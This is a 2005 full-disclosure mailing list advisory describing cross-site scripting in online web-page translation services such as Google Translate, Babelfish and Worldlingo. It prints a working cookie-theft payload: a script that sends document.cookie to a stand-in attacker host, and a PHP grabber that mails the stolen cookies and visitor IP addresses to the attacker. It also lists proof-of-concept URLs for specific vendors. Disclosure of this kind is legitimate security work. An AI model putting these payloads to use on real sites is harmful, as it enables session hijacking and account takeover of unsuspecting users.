lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 25 Dec 2005 02:37:14 -0000 (GMT)
From: simo@...x.org
To: bugtraq@...urityfocus.com,
	"Full Disclosure" <full-disclosure@...ts.grok.org.uk>
Subject: Multiple Translation websites Cross Site
 Scripting vulnerability: 
 Google, Altavista, IBM, freetranslation, worldlingo, etc



Title: Multiple Translation websites Cross Site Scripting
       vulnerability

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Date: 22 December 2005
MorX Security Research Team
http://www.morx.org

Service: Translation tools/websites

Vendors: Google, altavista, IBM, freetranslation, worldlingo
         paralink and almost any site using the webpage translation
         technique

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Tested on: Microsoft IE 6.0 and firefox 5.1
           (should work on all browsers)

Details:

the following is a Cross Site Scripting vulnerability that i ve found so far
in all translation websites that i ve seen, these websites use URL webpage
translation method which consist of passing a url of a user choice to the web
application for translating purpose, in fact after the webpage is being
processed
(translated) the application dosent filter the webpage content before
outputing it
into the user browser.

Impact:

a remote attacker can construct a malicious code in a webpage then upload
it to his/her
webserver and make a vulnerable website user visit the page thru the
translation script
and therefor execute the malicious code contents by the client browser.

malicous code as an example can be a javascript code to steal the victim
cookie

exemple of a malicious webpage:

<SCRIPT>location.href='http://www.attacker-site/grabber.php?cookie='+escape(document.cookie)</SCRIPT>

this javascript code will redirect the victim to the attacker php script
to grab the cookie information
and then log it or/and send it back the the attacker email

exemple of a php grabber

<?php
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("attacker@...il-address.com", $subject, $msg);
?>

for testing purpose you may use the following javascript

<script>alert('VULNERABLE'); alert(document.cookie);</script>

Proof Of Concept Exploits:

The following list is just a very small list of many vulnerable websites

paralink:

http://webtranslation.paralink.com/webtranslation.asp?clientid=default&appid=default&b=1&dir=en/fr&dic=general&extsvr=&auto=1&url=http://www.attacker-site/malicious-code.html

Google:

http://translate.google.com/translate?u=http://www.attacker-site/malicious-code.html

Freetranslation:

http://fets3.freetranslation.com/?Url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&Language=English%2FSpanish&Sequence=core

Altavista:

http://babelfish.altavista.com/babelfish/urltrurl?tt=url&url=http://www.attacker-site/malicious-code.html&lp=zh_en

IBM:

http://www.alphaworks.ibm.com/aw.nsf/html/mt
http://192.195.29.104/demand?mtlang=enfr&translate=http%253A%252F%252Fwww.attacker-site%252Fmalicious-code.html

Worldlingo:

http://www.worldlingo.com/wl/services/S221S1U3QrQ4rVX1J4x4O5WifQlI6nxpL/translation?wl_trglang=DE&wl_rurl=http%3A%2F%2Fwww.attacker-site.com&wl_url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html

Comprendium:

http://www.comprendium.es/index_demo_text_ca.html

online-translator:

http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&direction=er&template=General&cp1=NO&cp2=NO&autotranslate=on&transliterate=on&psubmit2.x=44&psubmit2.y=12

systranbox:

http://www.systranbox.com/systran/box


... and more

screen captures demonstrating the vulnerabilities:


www.morx.org/altavista.JPG
www.morx.org/altavista2.JPG

www.morx.org/google.JPG

www.morx.org/worldlingo.JPG
www.morx.org/worldlingo2.JPG

www.morx.org/freetranslation.JPG
www.morx.org/freetranslation2.JPG

www.morx.org/paralink.JPG
www.morx.org/paralink2.JPG

www.morx.org/online-translator.JPG

www.morx.org/ibm.JPG

www.morx.org/comprendium.JPG

www.morx.org/systran.JPG

Disclaimer:

this entire document is for eductional purposes and testing only.
Modification use and/or publishing this
information is entirely on your OWN risk, I cannot be held responsible for
any of the above

Most of the vendors were already contacted and informed about these
problems, some confirmed some didnt
answer back and some werent contacted because i couldnt find their contact
information.

My x-mas wish:

petit papa noel quand tu decendra du ciel avec tes cadeaux par milier n
oubli pas de foutre une bi** dans
le cu* a Abder (je t aime quand meme) :D

Greets:

Special Greets and Thanks to HandriX and all MorX members, Securma Massine
and Anasoft. greets to my brother
in fuxoring Abder :>


-- 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ